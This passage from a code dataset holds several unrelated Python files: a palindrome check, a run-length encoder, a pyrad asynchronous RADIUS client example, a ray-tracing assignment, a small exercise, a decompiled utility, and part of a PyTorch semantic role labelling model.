string2:\n return True\n else:\n return False\nprint(is_palindrome(\"1A Toyota's a Toyota1\"))","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"535070825","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 14 15:46:24 2016\n\n@author: ericdargan\n\"\"\"\n\n#Extra-Credit\n\ndef encoder(normal):\n encoded = []\n let = normal[0]\n count = 0\n \n for spot in range(len(normal)):\n \n if(let == normal[spot]):\n count += 1\n else:\n \n encoded.append([let,count])\n let = normal[spot]\n count = 1\n\n encoded.append([let,count])\n \n return str(encoded)\n \n\n \ndef decoder(encoded):\n decoded = encoded[1:len(encoded)-1]\n decoded = decoded.replace(\" \",\"\")\n decoded = decoded.split(\"],[\")\n decoded[0] = decoded[0].replace(\"[\",\"\")\n decoded[len(decoded) - 1] = decoded[len(decoded) - 1].replace(\"]\",\"\")\n \n for num in range(len(decoded)):\n decoded[num] = decoded[num].replace(\"'\",\"\")\n \n new_decoded = []\n for num in range(len(decoded)):\n new_decoded.append(decoded[num].split(\",\"))\n \n decoded = \"\"\n \n for num in range(len(new_decoded)):\n #decoded += new_decoded[num][0] * new_decoded[num][1]\n new_decoded[num][0] = new_decoded[num][0] * int(new_decoded[num][1])\n decoded += new_decoded[num][0]\n \n return decoded\n \ndef main():\n string = input(\"Please enter a string with many repeating characters: \")\n encoded = encoder(string)\n print(\"Encoded: \", encoded)\n print(\"Decoded: \", decoder(encoded))\n \nmain()\n ","sub_path":"ed1592_hw7_q7.py","file_name":"ed1592_hw7_q7.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"313655818","text":"#!/usr/bin/env python3\n\nimport asyncio\nimport logging\nimport traceback\n\nfrom os import path\n\nfrom pyrad.client_async import ClientAsync\nfrom pyrad.dictionary import Dictionary\nfrom pyrad.packet import PacketCode\n\nlogging.basicConfig(level='DEBUG',\n format='%(asctime)s [%(levelname)-8s] %(message)s')\n\n\ndef create_request(client, user):\n return client.create_auth_packet(**{\n 'User-Name': user,\n 'NAS-IP-Address': '192.168.1.10',\n 'NAS-Port': 0,\n 'Service-Type': 'Login-User',\n 'NAS-Identifier': 'trillian',\n 'Called-Station-Id': '00-04-5F-00-0F-D1',\n 'Calling-Station-Id': '00-01-24-80-B3-9C',\n 'Framed-IP-Address': '10.0.0.100',\n })\n\n\ndef print_reply(reply):\n if reply.code == PacketCode.ACCESS_ACCEPT:\n print('Access accepted')\n else:\n print('Access denied')\n\n print('Attributes returned by server:')\n for i in reply.keys():\n print(\"%s: %s\" % (i, reply[i]))\n\n\ndef initialize_transport(loop, client):\n loop.run_until_complete(\n asyncio.ensure_future(\n client.initialize_transports(enable_auth=True,\n local_addr='127.0.0.1',\n local_auth_port=8000,\n enable_acct=True,\n enable_coa=True)))\n\n\ndef main(path_to_dictionary):\n client = ClientAsync(server='localhost',\n secret=b'Kah3choteereethiejeimaeziecumi',\n timeout=4,\n dict=Dictionary(path_to_dictionary))\n\n loop = asyncio.get_event_loop()\n\n try:\n # Initialize transports\n initialize_transport(loop, client)\n\n requests = []\n for i in range(255):\n req = create_request(client, f'user{i}')\n future = client.send_packet(req)\n requests.append(future)\n\n # Send auth requests asynchronously to the server\n loop.run_until_complete(asyncio.ensure_future(\n asyncio.gather(\n *requests,\n return_exceptions=True\n )\n\n ))\n\n for future in requests:\n if future.exception():\n print('EXCEPTION ', future.exception())\n else:\n reply = future.result()\n print_reply(reply)\n\n # Close transports\n loop.run_until_complete(asyncio.ensure_future(\n client.deinitialize_transports()))\n print('END')\n except Exception as exc:\n print('Error: ', exc)\n traceback.print_exc()\n\n # Close transports\n loop.run_until_complete(asyncio.ensure_future(\n client.deinitialize_transports()))\n\n loop.close()\n\n\nif __name__ == '__main__':\n dictionary = path.join(path.dirname(path.abspath(__file__)), 'dictionary')\n main(dictionary)\n","sub_path":"example/auth_async.py","file_name":"auth_async.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"453421424","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\n\n#------------------------------INITIALIZE---------------------------\n\nwidth = 1000\nheight = 1000\n\nmax_depth = 3\n\ncamera = np.array([0, 0, 0])\n\n# screen (-50,-50,100) -> (50,50,100)\n# left, top, right, bottom\nscreen = (-50, 50, 50, -50) \n\n#light position and color define\nlight = { 'position': np.array([500, 500, 500]), 'ambient': np.array([1, 1, 1]), 'diffuse': np.array([1, 1, 1])}\n\nshadow_constant = 0.1\n\nobjects = []\n\n\n\n#-------------------------------FUNCTIONS-------------------------------\n\ndef create_sphere(N):\n objectList = []\n\n rgb_list = []\n for i in range(N):\n\n r1, g1, b1 = input(\"color of sphere \"+str(i+1)+\": (R,G,B)= \").replace('(', ' ').replace(')', ' ').split(',')\n \n r = float(r1) / 255.0 \n g = float(g1) / 255.0 \n b = float(b1) / 255.0\n\n rgb_list.append(np.array([r, g, b]))\n\n xyz_list = []\n radius_list = []\n for i in range(N):\n\n test = True\n while test:\n \n x1, y1, z1 = input(\"Position (x,y,z) of sphere \"+str(i+1)+\": \").replace('(', ' ').replace(')', ' ').split(',')\n\n x = float(x1)\n y = float(y1)\n z = float(z1)\n\n if z > 200 and z < 1000 and abs(x) < z/2 and abs(y) < z/2:\n test = False\n xyz_list.append(np.array([x, y, z]))\n else:\n print(\"z must be between 200 and 1000\")\n print(\"x and y must be smaller than z/2\")\n\n \n\n rad1 = input(\"Radius of sphere \" + str(i+1)+\": \")\n rad = float(rad1)\n radius_list.append(rad)\n\n for i in range(N): \n \n createdObject = {'center': xyz_list[i], 'radius': radius_list[i], 'ambient': rgb_list[i], 'diffuse': rgb_list[i], 'reflection': 1 }\n objectList.append(createdObject)\n \n return objectList\n\ndef normalVector(vector):\n normal = vector / np.linalg.norm(vector)\n return normal\n\ndef reflectionVector(vector, normal):\n reflect = vector - 2 * np.dot(vector, normal) * normal\n return reflect\n\ndef intersectionSphere(center, radius, ray_origin, ray_direction):\n b = 2 * np.dot(ray_direction, ray_origin - center)\n c = np.linalg.norm(ray_origin - center) ** 2 - radius ** 2\n a = 1.0\n delta = b ** 2 - 4 * a * c\n if delta > 0:\n root1 = (-b + np.sqrt(delta)) / 2\n root2 = (-b - np.sqrt(delta)) / 2\n if root1 > 0 and root2 > 0:\n return min(root1, root2)\n return None\n\ndef nearest_intersected_object(objects, ray_origin, ray_direction):\n distances = [intersectionSphere(obj['center'], obj['radius'], ray_origin, ray_direction) for obj in objects]\n nearestObject = None\n min_dist = np.inf\n for index, distance in enumerate(distances):\n if distance and distance < min_dist:\n min_dist = distance\n nearestObject = objects[index]\n return nearestObject, min_dist\n\n\n\ndef illumination_calculator(nearestObject, light_intersection, normal_to_surface):\n\n illumination = np.zeros((3))\n ambient_color = nearestObject['ambient'] * light['ambient']\n diffuse_color= nearestObject['diffuse'] * light['diffuse'] * np.dot(light_intersection, normal_to_surface)\n illumination = ambient_color + diffuse_color\n \n return illumination\n\n\ndef cast_ray(direction, color, depth, origin, reflection):\n\n nearestObject, min_dist = nearest_intersected_object(objects, origin, direction)\n if nearestObject is None:\n return color / depth \n\n intersection = origin + min_dist * direction\n normal_to_surface = normalVector(intersection - nearestObject['center'])\n tricky_point = intersection + 1e-5 * normal_to_surface # 1e - 5 = 10 ^ -5 (that is eligible value)\n light_intersection = normalVector(light['position'] - tricky_point) # tricky_point -> to don't find same sphere when nearest point, that was common method for it.\n\n _, min_dist = nearest_intersected_object(objects, tricky_point, light_intersection)\n light_intersection_distance = np.linalg.norm(light['position'] - intersection)\n is_shadowed = min_dist < light_intersection_distance\n\n if is_shadowed:\n return color / depth \n\n illumination = illumination_calculator(nearestObject, light_intersection, normal_to_surface)\n # reflection\n color += reflection * illumination\n reflection *= nearestObject['reflection']\n\n # color += illumination\n origin = tricky_point\n\n direction = reflectionVector(direction, normal_to_surface)\n\n if depth <= max_depth:\n return cast_ray(direction, color, depth+1, origin, reflection)\n \n else: \n return color / depth \n\n#--------------------------------MAIN----------------------------------\n\nprint(\"Number of spheres: \")\nN = int(input())\n\nobjects = create_sphere(N)\nplane = { 'center': np.array([0, -50000, 0]), 'radius': 50000 - 400, 'ambient': np.array([0.5, 0.5, 0.5]), 'diffuse': np.array([0.7, 0.7, 0.7]), 'reflection': 1 }\n\nobjects.append(plane)\n\nimage = np.zeros((height, width, 3))\nfor i, y in enumerate(np.linspace(screen[1], screen[3], height)):\n for j, x in enumerate(np.linspace(screen[0], screen[2], width)):\n # center of screen is on (0, 0, 100)\n pixel = np.array([x, y, 100])\n origin = camera\n direction = normalVector(pixel - origin)\n\n color = np.zeros((3))\n reflection = 1\n current_depth = 1\n\n color = cast_ray(direction, color, current_depth, origin, reflection)\n image[i, j] = np.clip(color, 0, 1)\n\nplt.imsave('shadow_balls.png', image)\n\n\nwith Image.open('shadow_balls.png') as img:\n img.show()","sub_path":"CMPE 460/Assignment2/assignment/assignment2.py","file_name":"assignment2.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"269669382","text":"\"\"\"\r\n71\r\nSpowoduj pojedynczym poleceniem python, by na ekranie\r\nn-krotnie wyświetliła się wartość wyrażenia -0.7e+4.07\r\nkażdorazowo rozdzielona znakiem @.\r\n\"\"\"\r\n\r\nn = int(input())\r\nco = -0.7 * pow(10, 4.07) # da się to lepiej zapisać?\r\nznak = '@'\r\n\r\nprint((str(co)+znak) * (n-1) + str(co) if (n > 0) else \"\")\r\n","sub_path":"JS/71.py","file_name":"71.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"180446851","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\tests\\utils.py\n# Compiled at: 2020-04-20 03:12:39\n# Size of source mod 2**32: 597 bytes\nimport json\nfrom jnius import autoclass\n\ndef load_java_tp(tp_json):\n \"\"\"Just used for testing, users won't need this.\"\"\"\n string_java = autoclass('java.lang.String')\n java_transform_process = autoclass('org.datavec.api.transform.TransformProcess')\n java_transform_process.fromJson(string_java(tp_json))\n\n\ndef inference_from_json(as_json):\n string_java = autoclass('java.lang.String')\n inference_configuration_java = autoclass('ai.konduit.serving.InferenceConfiguration')\n inference_configuration_java.fromJson(string_java(json.dumps(as_json)))","sub_path":"pycfiles/konduit-0.1.5-py3.7/utils.cpython-37.py","file_name":"utils.cpython-37.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"507962287","text":"import torch\nimport torch.nn.init as init\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.nn as nn\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nimport copy\nfrom driver.HighWayLSTM import Highway_Concat_BiLSTM\nfrom data.Embedding import load_predtrained_emb_zero, load_predtrained_emb_avg\n\ndef initializer_1d(input_tensor, initializer):\n assert len(input_tensor.size()) == 1\n input_tensor = input_tensor.view(-1, 1)\n input_tensor = initializer(input_tensor)\n return input_tensor.view(-1)\n\nclass SRLModel(nn.Module):\n def __init__(self, alphabet_dic, config, use_cuda):\n super(SRLModel, self).__init__()\n self.config = config\n self.srl_labels = alphabet_dic['srl_labels_dic']\n self.word_num = alphabet_dic['word_alphabet'].m_size\n self.word_string2id = alphabet_dic['word_alphabet'].string2id\n self.char_num = len(alphabet_dic['char_alphabet'].keys())\n self.use_cuda = use_cuda\n self.use_char = False\n self.word_embed_dim = config.word_embed_dim + config.srl_hidden_weight_output_size\n self.contextualization_size = config.contextualization_size + config.srl_hidden_weight_output_size\n self.contextualization_layers = config.contextualization_layers\n\n self.context_embeddings = nn.Embedding(self.word_num, config.word_embed_dim)\n nn.init.xavier_uniform_(self.context_embeddings.weight.data)\n self.head_embeddings = nn.Embedding(self.word_num, config.word_embed_dim)\n nn.init.xavier_uniform_(self.head_embeddings.weight.data)\n self.char_embedding = nn.Embedding(self.char_num, config.char_embedding_size)\n nn.init.xavier_uniform_(self.char_embedding.weight.data)\n self.span_width_embeddings = nn.Embedding(config.max_arg_width, config.feature_size)\n nn.init.xavier_uniform_(self.span_width_embeddings.weight.data)\n\n if config.context_embedding_path != '':\n embedding = load_predtrained_emb_zero(config.context_embedding_path, self.word_string2id)\n self.context_embeddings.weight.data.copy_(embedding)\n self.context_embeddings.weight.requires_grad = False\n if config.head_embedding_path != '':\n embedding = load_predtrained_emb_zero(config.head_embedding_path, self.word_string2id)\n self.head_embeddings.weight.data.copy_(embedding)\n self.head_embeddings.weight.requires_grad = False\n\n cnn_output_size = len(config.filter_widths) * config.filter_size\n lstm_input_size = self.word_embed_dim + cnn_output_size\n # self.lstmlist = nn.ModuleList(\n # [nn.LSTM(\n # input_size=lstm_input_size,\n # hidden_size=self.contextualization_size,\n # num_layers=1,\n # bidirectional=True,\n # batch_first=True)\n # for _ in range(self.contextualization_layers)]\n # )\n self.bilstm = Highway_Concat_BiLSTM(\n input_size=lstm_input_size,\n hidden_size=self.contextualization_size, # // 2 for MyLSTM\n num_layers=self.contextualization_layers,\n batch_first=True,\n bidirectional=True,\n dropout_in=0,\n dropout_out=config.lstm_dropout_rate\n )\n\n self.convs = nn.ModuleList(\n [nn.Conv2d(1, config.filter_size, (K, config.char_embedding_size), stride=1, padding=(K // 2, 0)) for K in\n config.filter_widths])\n\n # highway\n self.gate_linear = nn.Linear(lstm_input_size, lstm_input_size, bias=True)\n self.transform_linear = nn.Linear(self.contextualization_size*2, lstm_input_size)\n\n # ffnn output linear\n self.output_linear = nn.Linear(self.contextualization_size*2, config.num_attention_heads, bias=True)\n # 1\n self.linear0 = nn.Linear(self.contextualization_size*4+lstm_input_size+config.feature_size, config.ffnn_size, bias=True)\n self.linear1 = nn.Linear(config.ffnn_size, config.ffnn_size, bias=True)\n self.output_linear1 = nn.Linear(config.ffnn_size, config.num_attention_heads, bias=True)\n # predicate\n # SRL\n # self.linear2 = nn.Linear(self.contextualization_size*2, config.ffnn_size, bias=True)\n # ORL\n self.linear2 = nn.Linear(self.contextualization_size*4+lstm_input_size+config.feature_size, config.ffnn_size, bias=True)\n self.linear3 = nn.Linear(config.ffnn_size, config.ffnn_size, bias=True)\n self.output_linear2 = nn.Linear(config.ffnn_size, config.num_attention_heads, bias=True)\n\n # 3\n self.linear4 = nn.Linear(2*(self.contextualization_size*4+lstm_input_size+config.feature_size), config.ffnn_size, bias=True)\n self.linear5 = nn.Linear(config.ffnn_size, config.ffnn_size, bias=True)\n self.output_linear3 = nn.Linear(config.ffnn_size, len(self.srl_labels)-1, bias=True)\n\n self.dropout = nn.Dropout(config.dropout_rate)\n self.lexical_dropout = nn.Dropout(config.lexical_dropout_rate)\n self.lstm_dropout = nn.Dropout(config.lstm_dropout_rate)\n\n self.srl_hidden_weight = nn.Parameter(torch.FloatTensor(config.srl_hidden_weight_input_size, config.srl_hidden_weight_output_size), requires_grad=True)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n for layer in self.convs:\n init.xavier_uniform_(layer.weight)\n initializer_1d(layer.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.gate_linear.weight)\n initializer_1d(self.gate_linear.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.transform_linear.weight)\n\n init.xavier_uniform_(self.output_linear.weight)\n initializer_1d(self.output_linear.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.linear0.weight)\n initializer_1d(self.linear0.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.linear1.weight)\n initializer_1d(self.linear1.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.output_linear1.weight)\n initializer_1d(self.output_linear1.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.linear2.weight)\n initializer_1d(self.linear2.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.linear3.weight)\n initializer_1d(self.linear3.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.output_linear2.weight)\n initializer_1d(self.output_linear2.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.linear4.weight)\n initializer_1d(self.linear4.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.linear5.weight)\n initializer_1d(self.linear5.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.output_linear3.weight)\n initializer_1d(self.output_linear3.bias, init.xavier_uniform_)\n\n\n def forward(self, word_id_tensor, char_id_tensor, length_list, info_dic, srl_hiddens):\n length_tensor = torch.LongTensor(length_list)\n if self.use_cuda:\n length_tensor = length_tensor.cuda()\n context_word_emb = self.context_embeddings(word_id_tensor)\n head_word_emb = self.context_embeddings(word_id_tensor)\n\n srl_hidden = torch.bmm(srl_hiddens, self.srl_hidden_weight.expand(length_tensor.size(0), self.srl_hidden_weight.size(0), -1))\n context_word_emb = torch.cat((context_word_emb, srl_hidden), dim=-1)\n head_word_emb = torch.cat((head_word_emb, srl_hidden), dim=-1)\n\n context_emb, head_emb = self.getEmbeddings(char_id_tensor, context_word_emb, head_word_emb)\n\n # context_outputs = self.highwayLSTM(context_emb, length_list)\n # xqr highwaylstm\n masks = self.init_masks(len(length_list), length_tensor)\n context_outputs, _ = self.bilstm(context_emb, masks)\n ###\n # [sent_num, max_arg_width, max_len] ...\n candidate_starts, candidate_ends, candidate_mask = self.getSpanCandidates(length_tensor, self.config.max_arg_width)\n candidate_mask_shape = candidate_mask.size()\n # [sent_num, max_arg_width * max_len]\n flat_candidate_mask = candidate_mask.view(candidate_mask_shape[0], -1)\n\n cumsum = torch.cumsum(length_tensor, dim=0) # [sent_num]\n zeros = torch.zeros(1).long()\n if self.use_cuda:\n zeros = zeros.cuda()\n cumsum = torch.cat((zeros, cumsum[:-1]), 0) # [sent_num]\n batch_word_offset = torch.unsqueeze(cumsum, 1) # [sent_num, 1]\n # [num of total batch words]\n flat_candidate_starts = torch.masked_select(candidate_starts + batch_word_offset, flat_candidate_mask)\n flat_candidate_ends = torch.masked_select(candidate_ends + batch_word_offset, flat_candidate_mask)\n # [sent_num, max_len]\n text_len_mask = self.sequence_mask(length_tensor, int(max(length_tensor).item()))\n\n flat_context_outputs = self.flatten_emb_by_sentence(context_outputs, text_len_mask) # [num of total batch words, emb]\n flat_head_emb = self.flatten_emb_by_sentence(head_emb, text_len_mask) # [num of total batch words, emb]\n\n candidate_span_emb, head_scores, span_head_emb, head_indices, head_indices_log_mask = self.getSpanEmb(\n flat_head_emb, flat_context_outputs, flat_candidate_starts, flat_candidate_ends,\n ) # [num_candidates, emb], [num_candidates, max_span_width, emb], [num_candidates, max_span_width]\n\n # sparse_to_dense\n num_candidates = self.shape(candidate_span_emb, 0)\n max_num_candidates_per_sentence = self.shape(candidate_mask, 1)\n candidate_ids = torch.arange(0, num_candidates).long()\n # [num_sentences, max_num_candidates]\n # candidate_span_id = self.getSpanIds(candidate_mask, candidate_ids).long()\n\n # xqr code\n sparse_indices = (candidate_mask == 1).nonzero()\n sparse_values = torch.arange(0, num_candidates)\n if self.use_cuda:\n sparse_values = sparse_values.cuda()\n candidate_span_ids = torch.sparse.FloatTensor(sparse_indices.t(), sparse_values,\n torch.Size([len(length_list),\n max_num_candidates_per_sentence])).to_dense()\n candidate_span_ids = candidate_span_ids.long()\n ###\n\n spans_log_mask = torch.log(candidate_mask.float()) # [num_sentences, max_num_candidates]\n\n # Compute SRL representation.\n # [num_candidates,]\n flat_candidate_arg_scores = self.get_unary_scores(candidate_span_emb, self.dropout, 1)\n # [num_sents, max_num_candidates]\n # candidate_arg_score = self.getSpanIds(candidate_mask, flat_candidate_arg_scores) + spans_log_mask\n # xqr\n candidate_arg_scores = flat_candidate_arg_scores.index_select(0, candidate_span_ids.view(-1)) \\\n .view(candidate_span_ids.size()[0], candidate_span_ids.size()[1])\n candidate_arg_scores = candidate_arg_scores + spans_log_mask\n ###\n\n # [num_sentences, max_num_args], ... [num_sentences,], [num_sentences, max_num_args]\n max_len = int(max(length_tensor).item())\n arg_starts, arg_ends, arg_scores, num_args, top_arg_indices = self.get_batch_topk(\n candidate_starts, candidate_ends, candidate_arg_scores, self.config.argument_ratio, length_tensor,\n max_len, sort_spans=False, enforce_non_crossing=False)\n\n max_len = torch.arange(0, max_len)\n if self.use_cuda:\n max_len = max_len.cuda()\n candidate_pred_ids = max_len.unsqueeze(0).expand(len(length_list), -1) # [num_sentences, max_sentence_length]\n # SRL\n # candidate_pred_emb = context_outputs # [num_sentences, max_sentence_length, emb]\n # candidate_pred_scores = self.get_unary_scores(\n # candidate_pred_emb, self.dropout, 1, flag='candidate_pred_scores') + torch.log(text_len_mask.float()) # [num_sentences, max_sentence_length]\n # ORL\n candidate_pred_emb = candidate_span_emb\n flat_candidate_pred_scores = self.get_unary_scores(\n candidate_pred_emb, self.dropout, 1, flag='candidate_pred_scores') # [num_sentences, max_sentence_length]\n candidate_pred_scores = flat_candidate_pred_scores.index_select(0, candidate_span_ids.view(-1)) \\\n .view(candidate_span_ids.size()[0], candidate_span_ids.size()[1])\n candidate_pred_scores = candidate_pred_scores + spans_log_mask\n\n if self.config.use_gold_predicates:\n # predicates = inputs[\"gold_predicates\"]\n # num_preds = inputs[\"num_gold_predicates\"]\n # pred_scores = tf.zeros_like(predicates, dtype=tf.float32)\n # top_pred_indices = predicates\n raise RuntimeError\n else:\n # [num_sentences, max_num_preds] ... [num_sentences,]\n pred_starts, pred_ends, pred_scores, num_preds, top_pred_indices = self.get_batch_topk(\n candidate_starts, candidate_ends, candidate_pred_scores, self.config.predicate_ratio,\n length_tensor, max_len, sort_spans=False, enforce_non_crossing=False)\n\n #arg_span_indices = self.batchGather(candidate_span_ids, top_arg_indices) # [num_sentences, max_num_args]\n if self.use_cuda:\n top_arg_indices = top_arg_indices.cuda()\n top_pred_indices = top_pred_indices.cuda()\n arg_span_indices = torch.gather(candidate_span_ids, 1, top_arg_indices)\n arg_span_indices_size = arg_span_indices.size()\n arg_span_indices = arg_span_indices.view(-1)\n arg_emb = torch.index_select(candidate_span_emb, 0, arg_span_indices.long())\\\n .view(arg_span_indices_size[0], arg_span_indices_size[1], -1) # [num_sentences, max_num_args, emb]\n # SRL\n # pred_emb = self.batchGather(candidate_pred_emb, top_pred_indices) # [num_sentences, max_num_preds, emb]\n # ORL\n pred_span_indices = torch.gather(candidate_span_ids, 1, top_pred_indices)\n pred_span_indices_size = pred_span_indices.size()\n pred_span_indices = pred_span_indices.view(-1)\n pred_emb = torch.index_select(candidate_span_emb, 0, pred_span_indices.long()) \\\n .view(pred_span_indices_size[0], pred_span_indices_size[1], -1) # [num_sentences, max_num_args, emb]\n\n\n # [num_sentences, max_num_args, max_num_preds]\n srl_labels = self.get_srl_labels(arg_starts, arg_ends, pred_starts, pred_ends, info_dic, max(length_list))\n\n # [num_sentences, max_num_args, max_num_preds, num_labels]\n srl_scores = self.get_srl_scores(\n arg_emb, pred_emb, arg_scores, pred_scores, len(self.srl_labels), self.config, self.dropout\n )\n\n srl_loss = self.get_srl_softmax_loss(\n srl_scores, srl_labels, num_args, num_preds) # [num_sentences, max_num_args, max_num_preds]\n # srl_loss1 = self.get_srl_softmax_loss1(\n # srl_scores, srl_labels, num_args, num_preds)\n\n srl_scores_argmax = torch.max(srl_scores, dim=-1)[1]\n\n predict_dict = {\n \"candidate_starts\": candidate_starts.long().cpu().numpy(),\n \"candidate_ends\": candidate_ends.long().cpu().numpy(),\n \"head_scores\": head_scores.detach().cpu().numpy(),\n \"candidate_arg_scores\": candidate_arg_scores.detach().cpu().numpy(),\n \"candidate_pred_scores\": candidate_pred_scores.detach().cpu().numpy(),\n \"arg_starts\": arg_starts.long().cpu().numpy(),\n \"arg_ends\": arg_ends.long().cpu().numpy(),\n \"pred_starts\": pred_starts.cpu().numpy(),\n \"pred_ends\": pred_ends.cpu().numpy(),\n \"arg_scores\": arg_scores.detach().cpu().numpy(), # New ...\n \"pred_scores\": pred_scores.detach().cpu().numpy(),\n \"num_args\": num_args.long().cpu().numpy(),\n \"num_preds\": num_preds.long().cpu().numpy(),\n \"arg_labels\": srl_scores_argmax.cpu().numpy(), # [num_sentences, num_args, num_preds]\n \"srl_scores\": srl_scores.detach().cpu().numpy()\n }\n\n return predict_dict, srl_loss\n\n def init_masks(self, batch_size, lengths):\n max_sent_length = max(lengths)\n num_sentences = lengths.size()[0]\n indices = torch.arange(0, max_sent_length).unsqueeze(0).expand(num_sentences, -1)\n masks = indices < lengths.unsqueeze(1).cpu()\n masks = masks.type(torch.FloatTensor)\n # masks = torch.zeros(batch_size, max_length)s\n # masks.requires_grad = False\n # for i, length in enumerate(lengths):\n # masks.data[i][:length] += 1.0\n if self.use_cuda:\n masks = masks.cuda()\n return masks\n\n def getSpanIds(self, candidate_mask, ids):\n new_tensor = copy.deepcopy(candidate_mask).float()\n start, end = 0, 0\n for idx in range(len(new_tensor)):\n length = int(torch.sum(new_tensor[idx]).item())\n end += length\n new_tensor[idx][:length] = ids[start:end]\n start = end\n return new_tensor\n\n def getSpanEmb(self, head_emb, context_outputs, span_starts, span_ends):\n \"\"\"Compute span representation shared across tasks.\n Args:\n head_emb: Tensor of [num_words, emb]\n context_outputs: Tensor of [num_words, emb]\n span_starts: [num_spans]\n span_ends: [num_spans]\n \"\"\"\n sent_len = context_outputs.size(0)\n num_span =span_starts.size(0)\n\n span_start_emb = torch.index_select(context_outputs, 0, span_starts.long()) # [num_words, emb]\n span_end_emb = torch.index_select(context_outputs, 0, span_ends.long()) # [num_words, emb]\n span_emb_list = [span_start_emb, span_end_emb]\n\n span_width = 1 + span_ends - span_starts # [num_spans]\n max_arg_width = self.config.max_arg_width\n num_heads = self.config.num_attention_heads\n\n if self.config.use_features:\n span_width_index = span_width - 1 # [num_spans]\n span_width_emb = self.span_width_embeddings(span_width_index.long()) # [num_spans, emb]\n span_width_emb = self.dropout(span_width_emb)\n span_emb_list.append(span_width_emb)\n\n head_scores = None\n span_text_emb = None\n span_indices = None\n span_indices_log_mask = None\n\n if self.config.model_heads:\n threshold = torch.LongTensor([sent_len - 1])\n max_arg_width_range = torch.arange(0, max_arg_width)\n # if self.use_cuda:\n # threshold = threshold.cuda()\n # max_arg_width_range = max_arg_width_range.cuda()\n # [num_spans, max_span_width]\n span_starts = span_starts.cpu()\n span_indices = torch.min(max_arg_width_range.unsqueeze(0) + span_starts.unsqueeze(1), other=threshold)\n span_indices_size = span_indices.size()\n flat_span_indices = span_indices.long().view(span_indices_size[0] * span_indices_size[1])\n if self.use_cuda:\n flat_span_indices = flat_span_indices.cuda()\n span_text_emb = torch.index_select(head_emb,\n 0,\n flat_span_indices)\\\n .view(span_indices.size(0), span_indices.size(1), head_emb.size(1)) # [num_spans, max_arg_width, emb]\n\n span_indices_mask = self.sequence_mask(span_width, max_arg_width, dtype=torch.float).float()\n # [num_spans, max_arg_width]\n span_indices_log_mask = torch.log(span_indices_mask)\n if self.use_cuda:\n span_indices_log_mask = span_indices_log_mask.cuda()\n # head_scores\n head_scores = self.projection(context_outputs, num_heads) # [num_words, num_heads]\n\n # [num_spans, max_arg_width, num_heads]\n span_attention = F.softmax(\n torch.index_select(head_scores, 0, flat_span_indices).view(span_indices.size(0),\n span_indices.size(1),\n head_scores.size(1)\n ) + span_indices_log_mask.unsqueeze(2),\n dim=1)\n span_head_emb = torch.sum(span_attention * span_text_emb, dim=1) # [num_spans, emb]\n span_emb_list.append(span_head_emb)\n #\n span_emb = torch.cat(span_emb_list, 1) # [num_spans, emb]\n return span_emb, head_scores, span_text_emb, span_indices, span_indices_log_mask\n\n def sequence_mask(self, lengths, maxlen, dtype=torch.bool):\n if maxlen is None:\n maxlen = lengths.max()\n ones = torch.ones((len(lengths), maxlen)).long()\n mask = ~(ones.cumsum(dim=1).t() > lengths.cpu()).t()\n mask.type(dtype)\n if self.use_cuda:\n mask = mask.cuda()\n return mask\n\n def getEmbeddings(self, char_id_tensor, context_word_emb, head_word_emb):\n context_emb_list = [context_word_emb]\n head_emb_list = [head_word_emb]\n char_embed = self.char_embedding(char_id_tensor)\n shape = char_embed.size()\n char_embed = char_embed.view(shape[0]*shape[1], shape[2], shape[3])\n char_embed = torch.unsqueeze(char_embed, 1)\n conv_outputs = []\n for conv in self.convs:\n conv_outputs.append(torch.relu(conv(char_embed)).squeeze(3))\n pool_outputs = []\n for output in conv_outputs:\n pool_outputs.append(F.max_pool1d(output, kernel_size=output.size(2)).squeeze(2))\n outputs = torch.cat(pool_outputs, 1)\n outputs = outputs.view(shape[0], shape[1], -1)\n context_emb_list.append(outputs)\n head_emb_list.append(outputs)\n context_emb = torch.cat(context_emb_list, 2)\n head_emb = torch.cat(head_emb_list, 2)\n context_emb = self.lexical_dropout(context_emb)\n head_emb = self.lexical_dropout(head_emb)\n return context_emb, head_emb\n\n def highwayLSTM(self, context_emb, length_list):\n x = context_emb\n hidden = None\n for idx, lstm in enumerate(self.lstmlist):\n source_x = x\n x = pack_padded_sequence(x, lengths=length_list, batch_first=True)\n if idx == 0:\n x, hidden = lstm(x)\n else:\n x, hidden = lstm(x, hidden)\n x = pad_packed_sequence(x, batch_first=True)[0]\n x = self.lstm_dropout(x)\n x = self.transform_linear(x)\n output_x = x\n highway_gates = F.sigmoid(self.gate_linear(output_x))\n x = highway_gates * output_x + (1 - highway_gates) * source_x\n return x\n\n def 